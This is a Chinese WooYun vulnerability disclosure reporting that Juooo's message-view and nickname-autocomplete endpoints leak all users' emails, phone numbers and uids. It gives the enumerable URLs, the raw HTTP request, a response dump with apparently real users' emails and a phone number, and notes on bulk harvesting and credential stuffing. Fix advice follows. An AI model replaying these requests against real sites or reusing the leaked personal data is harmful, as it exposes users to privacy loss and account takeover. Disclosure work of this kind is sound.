当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141288

漏洞标题:聚橙网某功能缺陷泄漏所有用户重要信息

相关厂商:聚橙网

漏洞作者: 163dotcom

提交时间:2015-09-15 15:11

修复时间:2015-10-30 15:12

公开时间:2015-10-30 15:12

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

聚橙网某功能缺陷泄漏所有用户重要信息

详细说明:

聚橙网查看消息及写消息功能缺陷,导致可获取所有用户的账户重要信息,如昵称、注册邮箱、注册手机号、uid。
该漏洞的危害:
1)用户敏感信息泄漏(邮箱、手机)。

QQ浏览器截屏未命名.png


2)邮箱或手机作为登录名,可通过常用密码字典撞库登录,或爆破。

漏洞证明:

0x01 信息泄漏的入口:消息提醒
用户登录后,查看消息提醒地址如下,其中id可遍历:

http://www.juooo.com/myjuooo/view/408408


首次注册后会收到聚橙小秘书的消息如下:

QQ浏览器截屏未命名.png


在地址后面加/1,即可看到收件人的昵称:

http://www.juooo.com/myjuooo/view/408408/1


QQ浏览器截屏未命名.png


0x02 信息泄漏的关键:方法返回字段
写新消息时,输入昵称会根据昵称获取用户信息,抓得地址参数为:

GET /user/note/touser_autocomp?name=admin HTTP/1.1
Host: www.juooo.com


QQ浏览器截屏未命名.png


经测试,该请求方法没有作限制。输入如:admin,返回的数据如下,包括邮箱、手机、uid:

[{"nick_name":"admin666","username":"861169350@qq.com","id":"2825241"},{"nick_name":"admin     ","username":"48679394CE9486E7260B78BBAE7532F1","id":"2770504"},{"nick_name":"Admin","username":"AB7729CE249340615AC4AE67C6F52424","id":"2770173"},{"nick_name":"admin5","username":"admin5@qq.com","id":"2174990"},{"nick_name":"admin5","username":"444123794@qq.com","id":"2174960"},{"nick_name":"admin1z","username":"13626668520","id":"2158079"},{"nick_name":"admin9988x3X5","username":"admin9988x3X5","id":0},{"nick_name":"admin1718","username":"2010092902130964","id":0},{"nick_name":"admin888","username":"73604","id":0},{"nick_name":"admins","username":"68519","id":0},{"nick_name":"admincsren","username":"2010092902080185","id":0},{"nick_name":"admin_ming","username":"64197","id":0},{"nick_name":"admine","username":"61768","id":0},{"nick_name":"admin123","username":"61583","id":0},{"nick_name":"admin49qht","username":"admin49qht","id":0}]


0x03 该漏洞的利用
编写一个简单的程序,即可收集并保存所有用户的账号信息:

QQ浏览器截屏未命名.png


不到10分钟,即可遍历超过1万条消息,提取超过1600个有效账号信息,整理如下。按照此比例,消息共41万条,总共泄漏的账户信息达6万以上:

QQ浏览器截屏未命名.png


修复方案:

建议修复:
1)http://www.juooo.com/myjuooo/view/408408 增加权限校验。
2)/user/note/touser_autocomp?name=admin 方法可不返回username,或对username进行加密或遮挡处理。

版权声明:转载请注明来源 163dotcom@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论